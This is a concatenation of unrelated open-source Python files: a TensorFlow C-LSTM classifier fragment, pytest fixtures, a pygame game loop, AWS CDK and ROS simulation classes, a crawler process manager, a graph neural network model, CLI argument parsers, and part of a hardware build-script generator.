= config.num_filters self.hidden_size = len(self.filter_sizes) * self.num_filters self.num_layers = config.num_layers self.l2_reg_lambda = config.l2_reg_lambda # Placeholders self.batch_size = tf.placeholder(dtype=tf.int32, shape=[], name='batch_size') self.input_x = tf.placeholder(dtype=tf.int32, shape=[None, self.max_length], name='input_x') self.input_y = tf.placeholder(dtype=tf.int64, shape=[None], name='input_y') self.keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob') self.sequence_length = tf.placeholder(dtype=tf.int32, shape=[None], name='sequence_length') # L2 loss self.l2_loss = tf.constant(0.0) # Word embedding with tf.device('/cpu:0'), tf.name_scope('embedding'): embedding = tf.Variable(tf.random_uniform([self.vocab_size, self.embedding_size], -1.0, 1.0), name="embedding") embed = tf.nn.embedding_lookup(embedding, self.input_x) inputs = tf.expand_dims(embed, -1) # Input dropout inputs = tf.nn.dropout(inputs, keep_prob=self.keep_prob) conv_outputs = [] max_feature_length = self.max_length - max(self.filter_sizes) + 1 # Convolutional layer with different lengths of filters in parallel # No max-pooling for i, filter_size in enumerate(self.filter_sizes): with tf.variable_scope('conv-%s' % filter_size): # [filter size, embedding size, channels, number of filters] filter_shape = [filter_size, self.embedding_size, 1, self.num_filters] W = tf.get_variable('weights', filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1)) b = tf.get_variable('biases', [self.num_filters], initializer=tf.constant_initializer(0.0)) # Convolution conv = tf.nn.conv2d(inputs, W, strides=[1, 1, 1, 1], padding='VALID', name='conv') # Activation function h = tf.nn.relu(tf.nn.bias_add(conv, b), name='relu') # Remove channel dimension h_reshape = tf.squeeze(h, [2]) # Cut the feature sequence at the end based on the maximum filter length h_reshape = h_reshape[:, :max_feature_length, :] conv_outputs.append(h_reshape) # Concatenate the outputs from different filters if len(self.filter_sizes) > 1: rnn_inputs = tf.concat(conv_outputs, -1) else: rnn_inputs = h_reshape # LSTM cell cell = tf.contrib.rnn.LSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True, reuse=tf.get_variable_scope().reuse) # Add dropout to LSTM cell cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob) # Stacked LSTMs cell = tf.contrib.rnn.MultiRNNCell([cell]*self.num_layers, state_is_tuple=True) self._initial_state = cell.zero_state(self.batch_size, dtype=tf.float32) # Feed the CNN outputs to LSTM network with tf.variable_scope('LSTM'): outputs, state = tf.nn.dynamic_rnn(cell, rnn_inputs, initial_state=self._initial_state, sequence_length=self.sequence_length) self.final_state = state # Softmax output layer with tf.name_scope('softmax'): softmax_w = tf.get_variable('softmax_w', shape=[self.hidden_size, self.num_classes], dtype=tf.float32) softmax_b = tf.get_variable('softmax_b', shape=[self.num_classes], dtype=tf.float32) # L2 regularization for output layer self.l2_loss += tf.nn.l2_loss(softmax_w) self.l2_loss += tf.nn.l2_loss(softmax_b) # logits self.logits = tf.matmul(self.final_state[self.num_layers - 1].h, softmax_w) + softmax_b predictions = tf.nn.softmax(self.logits) self.predictions = tf.argmax(predictions, 1, name='predictions') # Loss with tf.name_scope('loss'): losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits) self.cost = tf.reduce_mean(losses) + self.l2_reg_lambda * self.l2_loss # Accuracy with tf.name_scope('accuracy'): 
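# Usage sketch for the classifier above (illustrative, TF1-style; `config`,
# `x_batch`, `y_batch`, `seq_lens`, `train_op`, and `sess` are assumed to be
# defined elsewhere and are not part of this class):
#   model = clstm_clf(config)
#   feed = {model.input_x: x_batch,
#           model.input_y: y_batch,
#           model.batch_size: len(x_batch),
#           model.sequence_length: seq_lens,  # per-example feature-sequence lengths
#           model.keep_prob: 0.5}
#   _, loss, acc = sess.run([train_op, model.cost, model.accuracy], feed_dict=feed)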
correct_predictions = tf.equal(self.predictions, self.input_y) self.correct_num = tf.reduce_sum(tf.cast(correct_predictions, tf.float32)) self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy') 1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- from pathlib import Path from typing import TYPE_CHECKING, Callable, Type import pytest from sqlalchemy.orm import Session from smorest_sfs.plugins.hierachy_xlsx.parsers import HierachyParser from smorest_sfs.utils.paths import ProjectPath from .utils import get_parsed_reader if TYPE_CHECKING: from .models import ( TestCodeTable as TestCodeTable_, TestHierachyTable as TestHierachyTable_, ) @pytest.fixture def xlsx_path_func() -> Callable[[str], Path]: def xlsx_path(filename: str) -> Path: xlsx_path = Path("tests", "data", "excels", filename) return ProjectPath.get_subpath_from_project(xlsx_path) return xlsx_path @pytest.fixture def TestHierachyTable() -> Type["TestHierachyTable_"]: # pylint: disable=W0621 from .models import TestHierachyTable as TestHierachyTable__ return TestHierachyTable__ @pytest.fixture def parser(xlsx_path_func: Callable[[str], Path]) -> HierachyParser: # pylint: disable=W0621 return get_parsed_reader("test-code.xlsx", xlsx_path_func) @pytest.fixture def TestCodeTable() -> Type["TestCodeTable_"]: # pylint: disable=W0621 from .models import TestCodeTable as TestCodeTable__ return TestCodeTable__ @pytest.fixture def session() -> "Session": from .models import Session_ session: "Session" = Session_() return session mes32/snakepitsnakepit/game_loop.py import sys import pygame import game_level import game_level_view import save_menu import load_menu from game_over_menu import GameOverMenu from player_stats import PlayerStats class GameLoop(): """ The current game session. Contains the main game loop. """ def __init__(self, screen): player_stats = PlayerStats() level = game_level.GameLevel(screen, player_stats) view = game_level_view.GameLevelView(level, screen) player = level.player view.render() while True: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif player.has_died(): menu = GameOverMenu(screen, view) quit = menu.get_choice() if quit: sys.exit() else: level = game_level.GameLevel(screen, player_stats) view = game_level_view.GameLevelView(level, screen) player = level.player view.render() continue elif event.type == pygame.KEYDOWN: if event.key == pygame.K_UP: player.plan_walk(y=-1) elif event.key == pygame.K_DOWN: player.plan_walk(y=1) elif event.key == pygame.K_LEFT: player.plan_walk(x=-1) elif event.key == pygame.K_RIGHT: player.plan_walk(x=1) elif event.key == pygame.K_z: player.plan_walk(0, 0) elif event.key == pygame.K_t: player.teleport(level) elif event.key == pygame.K_s: save_menu.SaveMenu(screen, view, level) elif event.key == pygame.K_l: menu = load_menu.LoadMenu(screen, view, level) loaded_level = menu.run() if loaded_level is not None: level = loaded_level view = game_level_view.GameLevelView(level, screen) player = level.player view.render() continue else: continue level.update() view.render()# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import TYPE_CHECKING, cast import aws_cdk.core as core from aws_cdk import aws_lambda from aws_orbit.remote_files.cdk import _lambda_path if TYPE_CHECKING: from aws_orbit.models.context import Context class LambdaBuilder: @staticmethod def get_or_build_construct_request( scope: core.Construct, context: "Context", team_name: str, ) -> aws_lambda.Function: stack = core.Stack.of(cast(core.IConstruct, scope)) lambda_function = cast(aws_lambda.Function, stack.node.try_find_child("construct_request")) if lambda_function is None: lambda_function = aws_lambda.Function( scope=stack, id="construct_request", function_name=f"orbit-{context.name}-{team_name}-k8s-construct-request", code=aws_lambda.Code.asset(_lambda_path("construct_request")), handler="index.handler", runtime=aws_lambda.Runtime.PYTHON_3_6, timeout=core.Duration.seconds(10), ) return lambda_function 0 import json with open("./country_to_code.json") as f: data = json.load(f) dic = {} for i in data: dic[data[i]] = i print(dic) with open("./code_to_country.json","w") as ff: json.dump(dic,ff) # -*- coding: utf-8 -*- ''' @Date: 2020/1/6 @Author: fanyibin @Description: 使用命令管理爬虫 ''' import re from frame_library.logger import get_log_config from seed.seed_manager import SeedManager from config.config_parser import get_config from importlib import import_module from os import popen import argparse parser = argparse.ArgumentParser() parser.add_argument('-s', help='seed: to make start seeds') parser.add_argument('-r', help='run: to run this spider') parser.add_argument('-rs', help='restart: to restart this spider') parser.add_argument('-c', help='clear: to clear all seeds of this spider') parser.add_argument('-cd', help='clear dups: to clear all dups of this spider') parser.add_argument('-v', help='view: to view this spider') parser.add_argument('-k', help='kill: to kill the process for of this spider') parser.add_argument('--runspider', help="Don't use this arg!") args = parser.parse_args() class Manager(object): def __init__(self): self.seed_name = args.s self.run_name = args.r self.clear_name = args.c self.cleardup_name = args.cd self.runspider_name = args.runspider self.view_name = args.v self.kill_name = args.k self.restart_name = args.rs self.name = (self.seed_name or self.run_name or self.clear_name or self.cleardup_name or self.runspider_name or self.view_name or self.kill_name or self.restart_name) self.name_seed = ':'.join([self.name, 'seed']) self.name_dup = ':'.join([self.name, 'dup']) self.log = get_log_config(self.name) self.seedmanager = SeedManager() self.spider_config = get_config('spider_config.ini').get('SPIDERS', self.name) self.python_env = get_config('settings.ini').get('FRAME_SETTINGS', 'PYTHON_ENV') def _spider_conf(self): spider_conf = eval(self.spider_config) _file = spider_conf.get('file') _class = spider_conf.get('class') return _file, _class @property def _spider_inst(self): _file, _class = self._spider_conf() inst = getattr(import_module('spiders.%s' % _file), '%s' % _class) return inst() def _make_seeds(self): start_func = getattr(self._spider_inst, 'start_requests')() for seed in start_func: 
self.seedmanager.push_seed(self.name_seed, seed) def _run_spider(self): self._spider_inst.run_server() def _run_command(self): if self._check_spider_isalive(): self.log.info('无法启动爬虫,因为<{}>已在后台运行,请使用 {} manager.py -rs {} 重启爬虫。'.format( self.name, self.python_env, self.name)) return popen('nohup {} manager.py --runspider {} >/dev/null 2>&1 &'.format(self.python_env, self.name)) self._view_spider() def _check_spider_isalive(self): if self._get_pid() is not None: return True return False def _clear_seeds(self): self.seedmanager.clear_seeds(self.name_seed) def _clear_dups(self): self.seedmanager.clear_dups(self.name_dup) def _get_pid_str(self, string): pid_str_lst = string.split(self.name) for _str in pid_str_lst: if 'runspider' in _str: return _str.strip() def _get_pid(self): ret = popen('ps -ef | grep {}'.format(self.name)) str_ret = ret.read() if 'runspider' not in str_ret: return None pid_str = self._get_pid_str(str_ret) pid = re.search(r'\w+\s+(\d+)\s+', pid_str).group(1) return pid def _view_spider(self): _pid = self._get_pid() if _pid is None: return self.log.info('<{}>没有在后台运行,PID=None。'.format(self.name)) self.log.info('<{}>正在后台运行,PID={}。'.format(self.name, _pid)) return _pid def _kill_spider(self): _pid = self._get_pid() if _pid is None: return self.log.info('<{}>没有在后台运行,PID=None。'.format(self.name)) popen('kill {}'.format(_pid)) self.log.info('<{}>已停止运行,PID={}。'.format(self.name, _pid)) def _restart_spider(self): self._kill_spider() self.log.info('<{}>准备重启...'.format(self.name)) self._run_command() def run(self): if self.clear_name: self._clear_seeds() if self.cleardup_name: self._clear_dups() if self.seed_name: self._make_seeds() if self.run_name: self._run_command() if self.runspider_name: self._run_spider() if self.view_name: self._view_spider() if self.kill_name: self._kill_spider() if self.restart_name: self._restart_spider() if __name__ == '__main__': manager = Manager() manager.run()################################################################################# # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). # # You may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. 
# ################################################################################# """A class for visual.""" from typing import Optional, Union from deepsim.core.color import Color from deepsim.core.vector3 import Vector3 from deepsim.core.pose import Pose from deepsim.core.material import Material from deepsim.gazebo.constants import GeometryType from deepsim_msgs.msg import Visual as ROSVisual class Visual: """ Visual class """ def __init__(self, link_name: Optional[str] = None, visual_name: Optional[str] = None, material: Optional[Material] = None, transparency: float = 0.0, visible: bool = True, geometry_type: Union[int, GeometryType] = GeometryType.EMPTY, mesh_geom_filename: Optional[str] = None, mesh_geom_scale: Optional[Vector3] = None, pose: Optional[Pose] = None) -> None: """ Initialize Visual class Args: link_name (Optional[str]): link name visual_name (Optional[str]): visual name material (Optional[Material]): material transparency (float): transparency [0.0 - 1.0] visible (bool): the flag whether visible or not geometry_type (Union[int, GeometryType]): the geometry type mesh_geom_filename (Optional[str]): mesh geometry filename mesh_geom_scale (Optional[Vector3]): the mesh scale in vector3 format. pose (Optional[Pose]): the pose of visual """ self._link_name = link_name self._visual_name = visual_name self._material = material.copy() if material else Material() self._transparency = transparency self._visible = visible self._geometry_type = geometry_type if isinstance(self._geometry_type, int): self._geometry_type = GeometryType(self._geometry_type) self._mesh_geom_filename = mesh_geom_filename self._mesh_geom_scale = mesh_geom_scale.copy() if mesh_geom_scale else Vector3.one() self._pose = pose.copy() if pose else Pose() @property def link_name(self) -> str: """ Returns the link name Returns: str: link name """ return self._link_name @link_name.setter def link_name(self, value: str) -> None: """ Set link name Args: value (str): link name """ self._link_name = value @property def visual_name(self) -> str: """ Returns the visual name Returns: str: visual name """ return self._visual_name @visual_name.setter def visual_name(self, value: str) -> None: """ Set visual name Args: value (str): visual name """ self._visual_name = value @property def material(self) -> Material: """ Returns the copy of material Returns: Material: the copy of material """ return self._material.copy() @material.setter def material(self, value: Material) -> None: """ Set the material Args: value (Material): the material """ self._material = value.copy() @property def transparency(self) -> float: """ Returns the transparency [0.0 - 1.0] - 0.0 is full transparency and 1.0 is opaque. Returns: float: the transparency value """ return self._transparency @transparency.setter def transparency(self, value: float) -> None: """ Set the transparency Args: value (float): the transparency """ self._transparency = value @property def visible(self) -> bool: """ Returns the flag whether visible or not. Returns: bool: the flag whether visible or not. 
""" return self._visible @visible.setter def visible(self, value: bool) -> None: """ Set the visible Args: value (bool): the visible """ self._visible = value @property def geometry_type(self) -> GeometryType: """ Returns the geometry type Returns: int: the geometry type """ return self._geometry_type @geometry_type.setter def geometry_type(self, value: Union[int, GeometryType]) -> None: """ Set the geometry_type Args: value (GeometryType): the geometry_type """ self._geometry_type = value if isinstance(self._geometry_type, int): self._geometry_type = GeometryType(self._geometry_type) @property def mesh_geom_filename(self) -> str: """ Returns the mesh geometry filename Returns: str: mesh geometry filename """ return self._mesh_geom_filename @mesh_geom_filename.setter def mesh_geom_filename(self, value: str) -> None: """ Set mesh geometry filename Args: value (str): mesh geometry filename """ self._mesh_geom_filename = value @property def mesh_geom_scale(self) -> Vector3: """ Returns the mesh geometry scale in Vector3 Returns: Vector3: the mesh geometry scale in Vector3 """ return self._mesh_geom_scale.copy() @mesh_geom_scale.setter def mesh_geom_scale(self, value: Vector3) -> None: """ Set the mesh geometry scale in Vector3 Args: value (Vector3): the mesh geometry scale in Vector3 """ self._mesh_geom_scale = value.copy() @property def pose(self) -> Pose: """ Returns the pose of the visual Returns: Pose: the pose of the visual """ return self._pose.copy() @pose.setter def pose(self, value: Pose) -> None: """ Set the pose of the visual Args: value (Pose): the pose of the visual """ self._pose = value.copy() def to_ros(self) -> ROSVisual: ros_visual = ROSVisual() ros_visual.link_name = self.link_name ros_visual.visual_name = self.visual_name ros_visual.ambient = self.material.ambient.to_ros() ros_visual.diffuse = self.material.diffuse.to_ros() ros_visual.specular = self.material.specular.to_ros() ros_visual.emissive = self.material.emissive.to_ros() ros_visual.transparency = self.transparency ros_visual.visible = self.visible ros_visual.geometry_type = self.geometry_type.value ros_visual.mesh_geom_filename = self.mesh_geom_filename ros_visual.mesh_geom_scale = self.mesh_geom_scale.to_ros() ros_visual.pose = self._pose.to_ros() return ros_visual @staticmethod def from_ros(value: ROSVisual) -> 'Visual': """ Returns new Visual object created from ROS GetVisualResponse Args: value (deepsim_msgs.msg.ROSVisual): ROS Visual Returns: Pose: new Visual object created from ROS Visual """ return Visual(link_name=value.link_name, visual_name=value.visual_name, material=Material(ambient=Color.from_ros(value.ambient), diffuse=Color.from_ros(value.diffuse), specular=Color.from_ros(value.specular), emissive=Color.from_ros(value.emissive)), transparency=value.transparency, visible=value.visible, geometry_type=value.geometry_type, mesh_geom_filename=value.mesh_geom_filename, mesh_geom_scale=Vector3.from_ros(value.mesh_geom_scale), pose=Pose.from_ros(value.pose)) def copy(self) -> 'Visual': """ Returns a copy. Returns: Visual: the copied visual """ return Visual(link_name=self._link_name, visual_name=self._visual_name, material=self._material, transparency=self._transparency, visible=self._visible, geometry_type=self._geometry_type, mesh_geom_filename=self._mesh_geom_filename, mesh_geom_scale=self._mesh_geom_scale, pose=self._pose) def __eq__(self, other: 'Visual') -> bool: """ Check whether given visual is equal to self. 
Args: other (Visual): other to compare Returns: bool: True if the differences of all components are within epsilon, Otherwise False. """ return (self._link_name == other._link_name and self._visual_name == other._visual_name and self._material == other._material and self._transparency == other._transparency and self._visible == other._visible and self._geometry_type == other._geometry_type and self._mesh_geom_filename == other._mesh_geom_filename and self._mesh_geom_scale == other._mesh_geom_scale and self._pose == other._pose) def __ne__(self, other: 'Visual') -> bool: """ Inequality of visuals is inequality of any components. Args: other (Visual): other to compare Returns: bool: False if there are the differences of any components, Otherwise True. """ return not self.__eq__(other) def __str__(self) -> str: """ String representation of a visual Returns: str: String representation of a visual """ repr_str = "(" repr_str += "link_name={}".format(repr(self._link_name)) repr_str += ", visual_name={}".format(repr(self._visual_name)) repr_str += ", material={}".format(repr(self._material)) repr_str += ", transparency={}".format(repr(self._transparency)) repr_str += ", visible={}".format(repr(self._visible)) repr_str += ", geometry_type={}".format(repr(self._geometry_type.name)) repr_str += ", mesh_geom_filename={}".format(repr(self._mesh_geom_filename)) repr_str += ", mesh_geom_scale={}".format(repr(self._mesh_geom_scale)) repr_str += ", pose={})".format(repr(self._pose)) return repr_str def __repr__(self) -> str: """ String representation including class Returns: str: String representation including class """ return "Visual" + str(self) # !/usr/bin/env python3 # -*- encoding: utf-8 -*- # @author: condi # @file: serializers.py # @time: 19-2-20 下午4:32 from rest_framework import serializers from .models import Image class SCUImageSerializer(serializers.ModelSerializer): """查增修""" last_open_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True) class Meta: model = Image fields = ('id', 'file_name', 'suffix', 'storage_path', 'last_open_time', 'file_size') # Star Wars Asciimation # show, if all is well, an animation of star wars in ASCII, telnet connection # should also work on computer with Python3 # URL: http://docs.micropython.org/en/latest/esp8266/esp8266/tutorial/network_tcp.html#star-wars-asciimation import socket # get addres information of site addr_info = socket.getaddrinfo("towel.blinkenlights.nl", 23) print(addr_info) #debug # get the IP and port addr = addr_info[0][-1] print(addr) #debug # connect to it via socket s = socket.socket() s.connect(addr) # print content/animation in console # use cntrl-C to interrupt while True: data = s.recv(500) print(str(data, 'utf8'), end='') # 2017-0812: seems not to work (anymore). Unknown. 
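# A more defensive variant of the read loop above (a sketch, not from the
# original source): catch the ECONNRESET reported in the traceback below and
# close the socket cleanly instead of crashing.
#   try:
#       while True:
#           data = s.recv(500)
#           if not data:
#               break
#           print(str(data, 'utf8'), end='')
#   except OSError as exc:  # e.g. [Errno 104] ECONNRESET
#       print('connection dropped:', exc)
#   finally:
#       s.close()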
''' Traceback (most recent call last): File "", line 1, in File "starwars.py", line 23, in starwars OSError: [Errno 104] ECONNRESET ''' import os import random from functools import partial import copy import time import numpy as np import torch from dgl import DGLGraph from dgl.nn import pytorch as dgl_layers from torch import optim from torch_geometric import nn as pyg_layers from torch_geometric.utils import to_networkx from .graph_net import GraphNet from .module_utils import init_optimizer def bc(**kwargs): base = { 'in_dropout': 0.5, 'out_dropout': 0.5, 'wd': 0.001, 'activation': 'relu', 'optimizer': 'adam', } base.update(**kwargs) return base SEARCH_SPACE_FLAT = [ bc(conv_class=partial(dgl_layers.TAGConv, k=4), n_layers=1, n_iter=700, lr=0.01, hidden_size=32, wd=0, activation='tanh', optimizer='adam'), # 1, 2, 3 bc(conv_class=partial(pyg_layers.SAGEConv, normalize=True), hidden_size=96, n_layers=2, n_iter=300, lr=0.01, wd=0), # 1 bc(conv_class=partial(dgl_layers.GraphConv), hidden_size=64, n_layers=2, n_iter=300, lr=0.01, wd=0, optimizer='adamw', activation='elu'), # 5, 1 bc(conv_class=partial(pyg_layers.GraphConv, aggr='add'), hidden_size=64, n_layers=1, n_iter=200, lr=0.001), # 2?, 3, 4 bc(conv_class=partial(dgl_layers.SGConv, k=5), hidden_size=96, n_layers=1, n_iter=500, lr=0.01, wd=0, optimizer='adam', activation='softsign'), # 4? ] def fix_seed(seed): random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) torch.backends.cudnn.deterministic = True class PYGModel: def __init__(self, n_classes, conv_class, hidden_size, n_layers, in_dropout, out_dropout, n_iter, wd, lr, optimizer, activation): self.conv_class = conv_class self.hidden_size = hidden_size self.n_layers = n_layers self.device = torch.device('cuda') self.n_iter = n_iter self.n_classes = n_classes self.in_dropout = in_dropout self.out_dropout = out_dropout self.lr = lr self.wd = wd self.optimizer_str = optimizer self.activation = activation self.model = None def init_model(self, data): input_size = data.x.shape[1] self.model = GraphNet( input_size=input_size, n_classes=self.n_classes, n_nodes=len(data.x), n_layers=self.n_layers, conv_class=self.conv_class, n_hidden=self.hidden_size, in_dropout=self.in_dropout, out_dropout=self.out_dropout, activation=self.activation) self.model = self.model.to(self.device) self.optimizer = init_optimizer(self.optimizer_str)(self.model.parameters(), lr=self.lr, weight_decay=self.wd) self.criterion = torch.nn.CrossEntropyLoss() def train(self, data, g, mask, n_iter): self.model.train() st = time.time() for epoch_idx in range(n_iter): self.optimizer.zero_grad() out = self.model(g, data) loss = self.criterion(out[mask], data.y[mask]) loss.backward() self.optimizer.step() if (time.time() - st) > 70: break def predict(self, data, g, mask=None): self.model.eval() with torch.no_grad(): pred = self.model(g, data) if mask is not None: pred = pred[mask] return pred def fit_predict(self, data, g): data = data.to(self.device) g = g.to(self.device) # Train + evaluate score on validation scores = [] preds = [] for train_idx, val_idx in data.cv: self.init_model(data) train_mask = torch.zeros(len(data.x), dtype=torch.bool) train_mask[np.array(data.train_indices)[train_idx]] = 1 val_mask = torch.zeros(len(data.x), dtype=torch.bool) val_mask[np.array(data.train_indices)[val_idx]] = 1 train_mask = train_mask.to(self.device) val_mask = val_mask.to(self.device) self.train(data, g, mask=train_mask, n_iter=self.n_iter) y_val_pred = self.predict(data, g, 
mask=val_mask).argmax(1) score = (y_val_pred == data.y[val_mask]).sum().cpu().numpy() / len(y_val_pred) scores.append(score) preds.append(torch.nn.functional.softmax(self.predict(data, g, mask=data.test_mask), dim=1)) # for _ in range(3): # self.train(data, g, mask=train_mask+val_mask, n_iter=5) # preds.append(torch.nn.functional.softmax(self.predict(data, g, mask=data.test_mask), dim=1)) score = np.mean(scores) # self.train(data, g, mask=train_mask+val_mask) # self.train(data, g, mask=data.train_mask + data.val_mask) # pred = self.predict(data, g, mask=data.test_mask) # pred = sum(preds) # self.n_iter = 1 # for i in range(5): # self.train(data, g, mask=data.train_mask + data.val_mask) # pred += self.predict(data, g, mask=data.test_mask) # pred /= 6 # t_pred = self.predict(data, mask=None) # t_pred = F.softmax(t_pred, dim=1).cpu().numpy() # test_mask = ~(data.train_mask + data.val_mask).cpu().numpy() # perc = np.percentile(t_pred[test_mask].max(axis=1), 15) # nmask = ((t_pred * test_mask[:, np.newaxis]).max(axis=1) > perc) # nmask = torch.tensor(nmask, dtype=torch.bool).cuda() # data.train_mask += nmask # data.y[test_mask] = torch.tensor(t_pred[test_mask].argmax(axis=1), dtype=torch.long).cuda() # self.n_iter = 5 # self.train(data, mask=data.train_mask+data.val_mask) # pred1 = self.predict(data, mask=data.test_mask).cpu().numpy() # pred = (pred + pred1) / 3 pred = torch.stack(preds).cpu().numpy() return pred, score def create_factory_method(n_classes): def create_model(**config): return PYGModel( n_classes, conv_class=config['conv_class'], hidden_size=config['hidden_size'], n_layers=config['n_layers'], in_dropout=config['in_dropout'], out_dropout=config['out_dropout'], n_iter=config['n_iter'], wd=config['wd'], lr=config['lr'], activation=config['activation'], optimizer=config['optimizer'], ) return create_model tomhosking/torchseq import argparse def parse_args(): parser = argparse.ArgumentParser( description="TorchSeq", ) parser.add_argument("-V", "--version", action="store_true", help="Display version") # Config stuff parser.add_argument( "-c", "--config", type=str, metavar="CONFIG", default="./configs/default.json", help="Path to config file" ) parser.add_argument( "-p", "--patch", type=str, metavar="PATCH", default=None, help="Config mask(s) to overwrite main config with", action="append", ) # Actions parser.add_argument("--train", action="store_true", help="Run training?") parser.add_argument("--validate", action="store_true", help="Run eval on dev?") parser.add_argument("--validate_train", action="store_true", help="Run eval on train?") parser.add_argument("--test", action="store_true", help="Run eval on test?") parser.add_argument("--silent", action="store_true", help="Disable logging") parser.add_argument( "--reload_after_train", action="store_true", help="Reload model after training to do a validation run" ) # Model loading parser.add_argument("--load_chkpt", type=str, metavar="CHECKPOINT", default=None, help="Path to checkpoint file") parser.add_argument("-l", "--load", type=str, metavar="MODEL", default=None, help="Path to model folder") parser.add_argument("--nocache", action="store_true", help="Disable loading from an old cache") # Paths parser.add_argument("-d", "--data_path", type=str, metavar="DATA", default="./data/", help="Path to data sources") parser.add_argument( "-o", "--output_path", type=str, metavar="OUTPUT", default="./runs/", help="Path to output folder" ) # Runtime parser.add_argument("--cpu", action="store_true", help="Disable CUDA") 
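# Example invocation of the CLI defined by these arguments (illustrative; the
# actual entry-point name and the config/patch paths are placeholders):
#   python -m torchseq --train --reload_after_train \
#       --config ./configs/default.json --patch ./configs/my_patch.json \
#       --data_path ./data/ --output_path ./runs/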
parser.add_argument("--debug", action="store_true", help="Enable debug mode") parser.add_argument("--profile", action="store_true", help="Enable profiler") args = parser.parse_args() return args #========================================================================= # build_orchestrator.py #========================================================================= # Backend that generates build files from a graph # # Author : # Date : June 11, 2019 # import os import re import shutil from mflowgen.assertions.assertion_helpers import dump_assertion_check_scripts from mflowgen.utils import get_top_dir, get_files_in_dir class BuildOrchestrator: def __init__( s, graph, backend_writer_cls ): s.g = graph s.w = backend_writer_cls() # The 'build' method analyzes the user's step dependency graph in # order to populate the rules and high-level dependencies (e.g., this # step depends on that step) of the build system graph s.build_system_rules = {} s.build_system_deps = {} # Build order s.order = [] # Metadata for each build directory s.build_dirs = {} s.build_ids = {} s.step_dirs = {} # Hidden metadata directory that saves parameterized YAMLs and # commands for each step s.metadata_dir = '.mflowgen' if os.path.exists( s.metadata_dir ): shutil.rmtree( s.metadata_dir ) os.mkdir( s.metadata_dir ) # Names for the generated run and debug scripts for each step s.mflowgen_run = 'mflowgen-run' s.mflowgen_debug = 'mflowgen-debug' s.mflowgen_precond = 'mflowgen-check-preconditions.py' s.mflowgen_postcond = 'mflowgen-check-postconditions.py' #----------------------------------------------------------------------- # dump_yamls #----------------------------------------------------------------------- # For the parameter system, we will dump each step's (parameterized) # configuration data into a hidden metadata directory. # def dump_yamls( s, step_name, build_dir ): inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) step = s.g.get_step( step_name ) step.dump_yaml( inner_dir ) #----------------------------------------------------------------------- # dump_commands #----------------------------------------------------------------------- # Each step's command script goes into the hidden metadata directory. # When executing a step, we just copy the commands to the build dir and # run it there. This also makes it easy for the user to run the step in # isolation for debug purposes. # def dump_commands( s, commands, step_name, build_dir ): # Directories inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) # Generate the command script gen = os.path.abspath( __file__ ).rstrip('c') with open( inner_dir + '/' + s.mflowgen_run, 'w' ) as fd: # Shebang # # - Enforce bash since we will be exporting # - Use error propagation flags so that builds will stop for errors fd.write( '#! 
/usr/bin/env bash\n' ) fd.write( 'set -euo pipefail\n' ) # Header fd.write( '#' + '='*73 + '\n' ) fd.write( '# ' + s.mflowgen_run + '\n' ) fd.write( '#' + '='*73 + '\n' ) fd.write( '# Generator : ' + gen + '\n' ) fd.write( '\n' ) # Pre # # - Starting timestamp # - Dump all parameters into the script # params = s.g.get_step( step_name ).params() params_str = 'export {}={}' params_commands = [] for k, v in params.items(): if type(v) is list: # can't export a list in bash, so need to serialize it serialized_value = ",".join(v) params_commands.append( params_str.format(k,serialized_value) ) else: params_commands.append( params_str.format(k,v) ) pre = [ 'rm -f .time_end', # clear end timestamp 'date +%Y-%m%d-%H%M-%S > .time_start', # start timestamp 'MFLOWGEN_STEP_HOME=$PWD', # save build directory ] pre = pre + params_commands fd.write( '# Pre\n' ) fd.write( '\n' ) for c in pre: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Commands fd.write( '# Commands\n' ) fd.write( '\n' ) for c in commands: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) # Post # # - Ending timestamp # post = [ 'cd $MFLOWGEN_STEP_HOME', # return to known location 'date +%Y-%m%d-%H%M-%S > .time_end', # end timestamp ] fd.write( '# Post\n' ) fd.write( '\n' ) for c in post: fd.write( c ) fd.write( '\n' ) fd.write( '\n' ) #----------------------------------------------------------------------- # dump_debug_commands #----------------------------------------------------------------------- # Each step's debug command script goes into the hidden metadata # directory. When executing debug for a step, we just copy the commands # to the build dir and run it there. This also makes it easy for the # user to launch debug on their own. # def dump_debug_commands( s, commands, step_name, build_dir ): # Directories inner_dir = s.metadata_dir + '/' + build_dir if not os.path.exists( inner_dir ): os.mkdir( inner_dir ) # Generate the debug command script gen = os.path.abspath( __file__ ).rstrip('c') with open( inner_dir + '/' + s.mflowgen_debug, 'w' ) as fd: # Shebang # # - Enforce bash since we will be exporting # - Use error propagation flags so the build will stop for errors fd.write( '#! /usr/bin/env bash\n' ) fd.write( 'set -euo pipefail\n' ) # Header fd.write( '#' + '='*73 + '\n' ) fd.write( '# ' + s.mflowgen_debug + '\n' ) fd.write( '#' + '='*73 + '\n' ) fd.write( '# Generator : ' + gen + '\n' ) fd.write( '\n' ) # Params 